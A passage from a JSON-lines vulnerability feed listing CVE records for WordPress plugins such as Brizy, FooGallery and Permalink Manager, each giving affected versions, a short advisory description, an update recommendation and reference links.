version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0edfebc-bf6b-4346-9cd7-ce00007e3620?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0edfebc-bf6b-4346-9cd7-ce00007e3620?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/public\\\/editor-build\\\/282-wp\\\/editor\\\/js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/public\\\/editor-build\\\/282-wp\\\/editor\\\/js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2087","slug":"brizy","versionImpact":"2.4.43","versionEndExcluding":"2.4.44","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form name values in all versions up to, and including, 2.4.43 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/694d0b49-c4dd-40f0-99c9-5eb8c3c08ba9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/694d0b49-c4dd-40f0-99c9-5eb8c3c08ba9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.4.41\\\/admin\\\/views\\\/form-data.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.4.41\\\/admin\\\/views\\\/form-data.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1161","slug":"brizy","versionImpact":"2.4.43","versionEndExcluding":"2.4.44","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Custom Attributes for blocks in all versions up to, and including, 2.4.43 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c955905-bf14-4afa-a282-0a8c74cd3b87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c955905-bf14-4afa-a282-0a8c74cd3b87?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3711","slug":"brizy","versionImpact":"2.4.43","versionEndExcluding":"2.4.44","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to unauthorized plugin setting update due to a missing capability check on the functions action_request_disable, action_change_template, and action_request_enable in all versions up to, and including, 2.4.43. This makes it possible for authenticated attackers, with contributor access or above, to enable\/disable the Brizy editor and modify the template used.","recommendation":"Update to version 2.4.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7092ce4a-bad9-4426-b94e-d9d688344272?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7092ce4a-bad9-4426-b94e-d9d688344272?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/admin\\\/main.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/admin\\\/main.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1940","slug":"brizy","versionImpact":"2.4.41","versionEndExcluding":"2.4.42","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post content in all versions up to, and including, 2.4.41 due to insufficient input sanitization performed only on the client side and insufficient output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.42, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e056dcb5-a66b-4cd3-9a73-37f226015e09?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e056dcb5-a66b-4cd3-9a73-37f226015e09?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055256%40brizy&new=3055256%40brizy&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055256%40brizy&new=3055256%40brizy&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8195","slug":"permalink-manager","versionImpact":"2.4.4","versionEndExcluding":"2.4.4.1","description":"The Permalink Manager Lite plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'debug_data', 'debug_query', and 'debug_redirect' functions in all versions up to, and including, 2.4.4. This makes it possible for unauthenticated attackers to extract sensitive data including password, title, and content of password-protected posts.","recommendation":"Update to version 2.4.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aadf1d59-60ba-4da2-adbb-4e84d587a34d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aadf1d59-60ba-4da2-adbb-4e84d587a34d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/permalink-manager\\\/tags\\\/2.4.4\\\/includes\\\/core\\\/permalink-manager-debug.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/permalink-manager\\\/tags\\\/2.4.4\\\/includes\\\/core\\\/permalink-manager-debug.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142479\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142479\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6498","slug":"collectchat","versionImpact":"2.4.3","versionEndExcluding":"2.4.4","description":"The Chatbot for WordPress by Collect.chat ?? WordPress plugin before 2.4.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 2.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eed58889-4be8-48df-9ef6-269df451e79e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eed58889-4be8-48df-9ef6-269df451e79e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3919","slug":"comments-import-export-woocommerce","versionImpact":"2.4.3","versionEndExcluding":"2.4.4","description":"The WordPress Comments Import & Export plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_settings function in all versions up to, and including, 2.4.3. Additionally, the plugin fails to properly sanitize and escape FTP settings parameters. \r\nThis makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts on the plugin settings page that will execute whenever an administrative user accesses an injected page.\r\nThe vulnerability was partially fixed in version 2.4.3 and fully fixed in version 2.4.4","recommendation":"Update to version 2.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comments-import-export-woocommerce\\\/trunk\\\/includes\\\/settings\\\/class-hf_cmt_impexpcsv-settings.php?rev=3278076\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comments-import-export-woocommerce\\\/trunk\\\/includes\\\/settings\\\/class-hf_cmt_impexpcsv-settings.php?rev=3278076\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288894\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288894\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301183\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301183\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8bc8863-04a9-4631-9510-624f98ea1e75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8bc8863-04a9-4631-9510-624f98ea1e75?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9866","slug":"event-tickets-with-ticket-scanner","versionImpact":"2.4.3","versionEndExcluding":"2.4.4","description":"The Event Tickets with Ticket Scanner plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data' parameters in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping and missing authorization on the functionality to manage tickets. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This missing authorization aspect of this was patched in 2.4.1, while the Cross-Site Scripting was fully patched in 2.4.4.","recommendation":"Update to version 2.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3172740%40event-tickets-with-ticket-scanner&new=3172740%40event-tickets-with-ticket-scanner&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3172740%40event-tickets-with-ticket-scanner&new=3172740%40event-tickets-with-ticket-scanner&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201198%40event-tickets-with-ticket-scanner&new=3201198%40event-tickets-with-ticket-scanner&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201198%40event-tickets-with-ticket-scanner&new=3201198%40event-tickets-with-ticket-scanner&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dcf1133-d437-4f0a-b2cf-c91e0f6b6ca9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dcf1133-d437-4f0a-b2cf-c91e0f6b6ca9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10775","slug":"piotnet-addons-for-elementor","versionImpact":"2.4.32","versionEndExcluding":"2.4.33","description":"The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.4.32 via the 'pafe-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 2.4.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3221445%40piotnet-addons-for-elementor&new=3221445%40piotnet-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3221445%40piotnet-addons-for-elementor&new=3221445%40piotnet-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fdbc9bc-70cf-4440-b12d-dd98844d33bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fdbc9bc-70cf-4440-b12d-dd98844d33bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6068","slug":"foogallery","versionImpact":"2.4.31","versionEndExcluding":"2.4.32","description":"The FooGallery \u2013 Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `data-caption-title` & `data-caption-description` HTML attributes in all versions up to, and including, 2.4.31 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/foogallery\\\/trunk\\\/extensions\\\/default-templates\\\/shared\\\/js\\\/foogallery.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/foogallery\\\/trunk\\\/extensions\\\/default-templates\\\/shared\\\/js\\\/foogallery.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3322251%40foogallery&new=3322251%40foogallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3322251%40foogallery&new=3322251%40foogallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6be4aaa-f8a1-42d6-95c1-062c5ca51004?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6be4aaa-f8a1-42d6-95c1-062c5ca51004?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5502","slug":"piotnet-addons-for-elementor","versionImpact":"2.4.30","versionEndExcluding":"2.4.31","description":"The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Accordion, Dual Heading, and Vertical Timeline widgets in all versions up to, and including, 2.4.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/921616e4-2b66-4847-869a-90c1c459685f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/921616e4-2b66-4847-869a-90c1c459685f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-image-accordion.php#L627\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-image-accordion.php#L627\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-dual-color-headline.php#L392\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-dual-color-headline.php#L392\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-vertical-timeline.php#L622\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-vertical-timeline.php#L622\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138599\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138599\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5614","slug":"piotnet-addons-for-elementor","versionImpact":"2.4.29","versionEndExcluding":"2.4.30","description":"The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.4.29 via the 'pafe_posts_list' function. This makes it possible for unauthenticated attackers to extract sensitive data including titles and excerpts of future, draft, and pending blog posts.","recommendation":"Update to version 2.4.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2880cde0-a278-4a41-97f7-c54c2b3aceb2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2880cde0-a278-4a41-97f7-c54c2b3aceb2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/inc\\\/ajax-posts-list.php#L4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/inc\\\/ajax-posts-list.php#L4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125094\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125094\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12119","slug":"foogallery","versionImpact":"2.4.29","versionEndExcluding":"2.4.30","description":"The FooGallery \u2013 Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the default_gallery_title_size parameter in all versions up to, and including, 2.4.29 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with granted gallery and album creator roles, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/fooplugins\\\/foogallery\\\/blob\\\/master\\\/extensions\\\/albums\\\/album-default.php#L26\",\"name\":\"https:\\\/\\\/github.com\\\/fooplugins\\\/foogallery\\\/blob\\\/master\\\/extensions\\\/albums\\\/album-default.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/foogallery\\\/tags\\\/2.4.27\\\/extensions\\\/albums\\\/album-default.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/foogallery\\\/tags\\\/2.4.27\\\/extensions\\\/albums\\\/album-default.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2070c6e6-d830-4d1c-9408-5cb2254a00e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2070c6e6-d830-4d1c-9408-5cb2254a00e5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12114","slug":"foogallery","versionImpact":"2.4.29","versionEndExcluding":"2.4.30","description":"The FooGallery \u2013 Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.4.29 via the foogallery_attachment_modal_save AJAX action due to missing validation on a user controlled key (img_id). This makes it possible for authenticated attackers, with granted access and above, to update arbitrary post and page content. This requires the Gallery Creator Role setting to be a value lower than 'Editor' for there to be any real impact.","recommendation":"Update to version 2.4.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/fooplugins\\\/foogallery\\\/blob\\\/master\\\/includes\\\/admin\\\/class-gallery-attachment-modal.php#L242\",\"name\":\"https:\\\/\\\/github.com\\\/fooplugins\\\/foogallery\\\/blob\\\/master\\\/includes\\\/admin\\\/class-gallery-attachment-modal.php#L242\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250684\\\/foogallery\\\/tags\\\/2.4.30\\\/includes\\\/admin\\\/class-gallery-attachment-modal.php?old=3229839&old_path=foogallery%2Ftags%2F2.4.29%2Fincludes%2Fadmin%2Fclass-gallery-attachment-modal.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250684\\\/foogallery\\\/tags\\\/2.4.30\\\/includes\\\/admin\\\/class-gallery-attachment-modal.php?old=3229839&old_path=foogallery%2Ftags%2F2.4.29%2Fincludes%2Fadmin%2Fclass-gallery-attachment-modal.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4fe3ad9-247f-4e5d-8c79-0970afaa7729?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4fe3ad9-247f-4e5d-8c79-0970afaa7729?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2538","slug":"permalink-manager","versionImpact":"2.4.3.1","versionEndExcluding":"2.4.3.2","description":"The Permalink Manager Lite plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_save_permalink' function in all versions up to, and including, 2.4.3.1. This makes it possible for authenticated attackers, with author access and above, to modify the permalinks of arbitrary posts.","recommendation":"Update to version 2.4.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70cd028d-122d-4e3c-ac09-150dec07a2cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70cd028d-122d-4e3c-ac09-150dec07a2cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/gist.github.com\\\/Xib3rR4dAr\\\/b1eec00e844932c6f2f30a63024b404e\",\"name\":\"https:\\\/\\\/gist.github.com\\\/Xib3rR4dAr\\\/b1eec00e844932c6f2f30a63024b404e\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3052848#file35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3052848#file35\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11811","slug":"push-notification-by-feedify","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The Feedify \u2013 Web Push Notifications plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'platform', 'phone', 'email', and 'store_url' parameters in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3209183%40push-notification-by-feedify%2Ftrunk&old=3177773%40push-notification-by-feedify%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3209183%40push-notification-by-feedify%2Ftrunk&old=3177773%40push-notification-by-feedify%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a5a33fd-ecc6-40bf-93a5-10ead1c4c1f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a5a33fd-ecc6-40bf-93a5-10ead1c4c1f5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6872","slug":"templatespare","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The Build Your Dream Website Fast with 400+ Starter Templates and Landing Pages, No Coding Needed, One-Click Import for Elementor & Gutenberg Blocks! \u2013 TemplateSpare plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'templatespare_activate_required_theme' and 'templatespare_get_theme_status' functions in all versions up to, and including, 2.4.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate any installed theme and read any theme status. If the attacker attempts to activate a theme that is not installed, a non-existent theme with the slug chosen by the attacker will be considered the active theme, leaving the site with no theme functionality.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0c74807-b85c-478e-bebf-1f0b46a21c11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0c74807-b85c-478e-bebf-1f0b46a21c11?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/templatespare\\\/trunk\\\/includes\\\/templatespare-kit.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/templatespare\\\/trunk\\\/includes\\\/templatespare-kit.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/templatespare\\\/trunk\\\/includes\\\/templatespare-kit.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/templatespare\\\/trunk\\\/includes\\\/templatespare-kit.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129809\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129809\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3201","slug":"kali-forms","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The Contact Form builder with drag & drop for WordPress WordPress plugin before 2.4.3 does not sanitise and escape some of its settings, which could allow high privilege users such as contributors to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4248289f-36d2-41c5-baf6-bb2c630482ef\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4248289f-36d2-41c5-baf6-bb2c630482ef\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
